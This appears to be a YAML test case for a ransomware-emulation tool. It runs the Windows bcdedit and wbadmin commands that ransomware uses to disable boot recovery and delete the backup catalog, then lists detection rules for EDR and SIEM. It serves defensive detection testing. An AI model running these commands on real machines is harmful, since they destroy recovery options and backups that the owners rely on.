id: RANSIM_P2_002_boot_recovery_tamper
name: "Ransomware Phase 2 — Boot Recovery and Error Handling Disable"
mitre: T1490
category: defense_evasion
description: >
  Ransomware disables Windows boot recovery and error handling to prevent the OS
  from recovering after encryption. Uses bcdedit and wbadmin commands seen in
  LockBit, Conti, REvil, and BlackCat. Tests whether boot config tampering
  is detected before encryption begins.

requirements:
  os: windows
  admin: true

steps:
  - type: marker
    message: "[RANSIM P2] Disabling boot recovery options"

  - type: exec
    binary: cmd.exe
    args: /c bcdedit /set {default} recoveryenabled No
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c wbadmin delete catalog -quiet
    timeout_seconds: 10

  - type: sleep
    seconds: 20

  - type: marker
    message: "[RANSIM P2] Cleanup: re-enabling boot recovery"

  - type: exec
    binary: cmd.exe
    args: /c bcdedit /set {default} recoveryenabled Yes
    timeout_seconds: 10

  - type: exec
    binary: cmd.exe
    args: /c bcdedit /set {default} bootstatuspolicy displayallfailures
    timeout_seconds: 10

analyst_checklist:
  - "Sysmon Event ID 1: bcdedit with recoveryenabled No — fully logged?"
  - "EDR: Alert on bcdedit modifying boot recovery settings?"
  - "EDR: wbadmin delete catalog captured?"
  - "EDR: Blocked or detected-only?"
  - "SIEM: bcdedit.exe process events present?"
  - "Rule opportunity (critical): bcdedit.exe with 'recoveryenabled' and 'No' in commandline"
  - "Rule opportunity: bcdedit.exe with 'bootstatuspolicy' and 'ignoreallfailures'"
  - "Rule opportunity: wbadmin.exe with 'delete catalog' outside maintenance window"
